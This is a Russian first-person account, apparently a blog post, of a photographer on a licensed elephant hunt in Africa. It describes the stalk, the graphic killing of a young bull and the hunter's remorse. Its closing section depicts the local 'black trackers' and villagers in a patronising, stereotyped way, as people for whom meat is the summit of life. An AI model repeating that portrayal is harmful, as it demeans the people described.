Мы же, снова – тут как тут, –  опять медленно обходим их ряды, выискивая свою цель! Нас союзник, - ветер, почему-то сегодня дует с востока, - со стороны солнца? Мы бы рады видеть стадо не в контражуре(темные пятна на фоне солнечного слепящего сияния), а хорошо освещенным, но не можем дать ветру возможность донести наши запахи до стада, ибо это и есть тот «спусковой крючок», который мгновенно поднимет все стадо на ноги и оно унесется вдаль! Поэтому вынуждены терпеть эту ситуацию, когда стадо уходит «на солнце», на восток, а мы – вслед за ним.

Помня о «своем месте», не лезу вперед трекеров и ребят с карабинами. Но все время выискиваю между деревьями вид, что бы слоны были в объективе как можно более полнее и ярче!  Но пока среди деревьев видны опять только части слонов, –  хоботы, уши, тела животных или их крупы.

Увлеченно охотясь за слонами (а точнее, - за слоновьими образами), - подбегая, прячась, оглядываясь, наводя на фокус, снимая и тд, автоматически отмечаю свои собственные реакции и вижу, что резко полюбил …флору!? Причем, самую сильную, толстую и значительную! Взгляд механически отмечает вокруг все толстые и мощные деревья!  А вокруг нас, - как на зло, - одно мелкое редколесье! До слонов остается 30-40 метров почти открытого пространства. Для каждого из них, это - полминуты бега! Но они, как настоящие стадные существа, следуют за стадом и для того, что бы напасть на нас, их нужно всерьез разозлить! Понимаю разумом, что пока все тихо, слоны не нападут! И все равно, тоскливо как-то и неприютно стоять в двух шагах от дикого стада этих плейстоценовых монстров! Кажешься себе маленьким, беззащитным и убогим! Так и хочется спрятаться за что-то серьезное и надежное: дерево, например! А лучше - за что-то, похожее на танк! Или - закопаться в матушку-землю, на пару метров вниз! Видимо, организм, независимо от моего сознания, отрабатывает свою Стратегию поведения, направленную на собственное сохранение! Мол, ты там как хочешь, развлекайся, типа, чертов крейзи, а я позабочусь о себе! Поэтому и полюбились мне внезапно (чисто подсознательно) самые толстые деревья, потому что обычные (толщиной с ногу человека), слоны ломают, как спички!

В нашей группе проблемы. Михаил в роли Охотника, а Сева - в роли ПиЭйча, он руководит следопытами и всем процессом. Мише давно хочется отстрелять слона, есть лицензия, но он накануне повредил ногу и бегать по горам ему тяжело. От травмы и состояние организма нерабочее. Поэтому ему данная Охота сегодня, - немного «не-в-масть», даже, - совсем не нужная. Но, Сева - его компаньон и руководитель Охоты, гнет свою линию - надо добыть слона! Надо! А слоны, как на зло, постоянно тасуются туда-сюда, поднимая облака пыли, прячутся за деревьями и кустами, не давая возможности рассмотреть себя и выбрать что-то стоящее. Поэтому найти нужного совсем не просто, тем более, что они постоянно уходят от нас в следующую долину. Мы их догоняем, они опять уходят, мы следуем рядом и высматриваем самого-самого! Все это очень увлекательно, но требует море энергии и сил!

Мощный  самец, с не очень еще большими бивнями, пасется несколько отдельно от стада. Он молодой, могучий, ничего и никого в этой жизни не боится! У него видимо маловато опыта жизни, поэтому какие-то там  «маленькие карлики», бегающие за ним следом, его никак не волнуют. В отличие от умных и опытных стариков, которые от запаха человека готовы сбежать на  край света, он спокойно пасется среди крон деревьев. Эта самоуверенность стоила ему жизни!

Ребята решают - искать более крупные бивни нет смысла, времени и сил, поэтому - берем его! Между нами лежит открытая лощина, заросшая невысокими, какими-то худосочными деревцами. Прячась друг за другом, подбираемся ближе. Выбрав цель,  и определившись, все стало более понятно. Сева с Мишей и главным следопытом подбираются ближе, я чуть отстаю и выбираю такой ракурс, что бы слон и охотники все время были у меня в «кадре». Вот слон повернулся к ним боком и Миша стреляет ему в сердце цельнометаллической пулей, которая пробивает его насквозь. Слон потрясен, он громко трубит, топчется на месте и ему вдруг так захотелось отсюда уйти. Но, видимо, уже поздно! Он зашатался, садится на зад, хобот при этом летит по широкой амплитуде, он его уже не контролирует! Качаясь, слон ударяется боком о дерево, оно трещит, гнется и ломается. Он встает опять, шатается, топчется на месте, поднимая клубы пыли, хобот его описывает огромные дуги, слон в шоке. Следует еще выстрел, на этот раз в крестец. Ноги его отказывают и он садится на землю. Подняв морду, с загнутым назад хоботом вверх, он испускает трубный и громкий рев, как бы прощаясь со своими сородичами, этими родными саваннами и с жизнью…

Охотники неумолимо приближаются. Что бы прекратить страдания великана, ему стреляют в голову, и вот, наконец, слон падает на землю, с каким-то утробным звуком. Стоим в сторонке, как бы и «не причем», смотрим, как Жизнь покидает гиганта саванн. Его сотрясают конвульсии, это могучий зверь и жизнь не торопится его оставить! Но вот, из хобота пошли кровяные пузыри и слон затихает навсегда! Охотники медленно и растерянно приближаются! К гибели такого гиганта привыкнуть видимо, нельзя никогда!

Миша (немолодой уже мужик, прошедший в своей жизни «крым-рым»,  Афган) снимает с себя мокрую шляпу, обнажая лысину, подходит к темной, еще теплой туше и говорит, горько так: - «Вот так убивают слона! Просто убивают! Я - убийца!»

Мы стоим, молчим, тоже потрясенные таким волнующим зрелищем, понимая, что ему видимо непросто это пережить, все-таки - первый Элефант, которого он лишил Жизни! Хобот слона лежит на траве совсем как живой. Он покрыт черной волнистой пористой кожей, которая похожа на …микропорку. У меня возникло на миг видение, что он зашевелился! Невероятно!

Потом Миша  подходит к хвосту слона, поднимает «кисточку» его хвоста, вооруженную двумя рядами черных и жестких как проволока волос, выдирает несколько штук, дарит мне на память, потом берет себе. Это особенные «волоски», длиной до 20 см, толщиной в миллиметр и из них в Африке  получаются шикарные браслеты. Они, якобы, по местным поверьям, действуют от «сглаза», «порчи»,  нападения зверей и всего такого... Теперь нам с ним – все нипочем!

Последнее впечатление от Охоты, - грустный и опечаленный Михаил. Он ходит, как в воду опущенный, не зная, куда себя деть, хоть это его День и первый в жизни и охотничьей карьере, слон! А он подтвердил для всех еще раз, что перед нами - Настоящий Мужчина и Охотник! Но, он видимо еще и Человек, созерцающий с печалию плоды деяний рук своих…

х                            х                                   х

…Самыми счастливыми на свете были …наши черные следопыты. Это - их день! Столько мяса! Вот оно – Счастье! Оно есть! Его не может не быть!  Для них – это апофеоз всей их жизни: альфа и омега! Выслушав наказы белых, - что берем, что не берем, они тут же отрезают хобот, хвост и тащат это все в грузовик. Снимаю, как они самозабвенно  кромсают гиганта, страдая уже от того, что так много мяса достанется кому-то другому, кто не участвовал в охоте, а не им! Наш охотничий лагерь на сегодня, как вымер. Нет ни садовников, ни уборщиков, ни поваров, никого! Все население двух деревень, включая грудных детей, - на разделке слона! Для них это - нечастый и Главный в их жизни Праздник! Там, на туше, происходит дележка и драка за мясо!  Но это уже – другая история…


AddThis Social Bookmark Button
 

Добавить комментарий


Защитный код
Обновить